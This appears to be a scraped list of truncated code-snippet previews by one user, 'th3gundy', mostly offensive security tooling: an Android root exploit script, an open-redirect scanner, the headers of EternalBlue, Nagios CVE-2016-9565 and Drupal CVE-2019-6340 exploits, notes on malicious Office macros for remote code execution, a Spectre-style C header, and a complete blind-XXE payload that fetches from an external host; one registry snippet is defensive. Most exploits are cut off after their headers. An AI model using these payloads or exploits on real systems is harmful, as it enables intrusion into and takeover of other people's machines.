th3gundy

#!/bin/bash

# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;

# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";

th3gundy

import requests
import sys
import time
import os


os.system('clear')
print "#################################################"
print "# Open redirect Scanner for dummies like me :)  #"
print "#  by ak1t4 (know.0nix@gmail.com)               #"

th3gundy

import requests
import re
import sys
from multiprocessing.dummy import Pool


def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
        ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

th3gundy

#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

th3gundy

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

th3gundy

#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py  ver. 1.0

Discovered & Coded by:

Dawid Golunski
https://legalhackers.com
\033[0m

th3gundy

This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

0. Page substiution macro for luring user to click Enable Content
1. The Unicorn Powershell based payload

th3gundy

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

th3gundy

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

th3gundy

#!/usr/bin/env python3

# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza

# Technical details for this exploit is available at:
#   https://www.drupal.org/sa-core-2019-003
#   https://www.ambionics.io/blog/drupal8-rce
#   https://twitter.com/jcran/status/1099206271901798400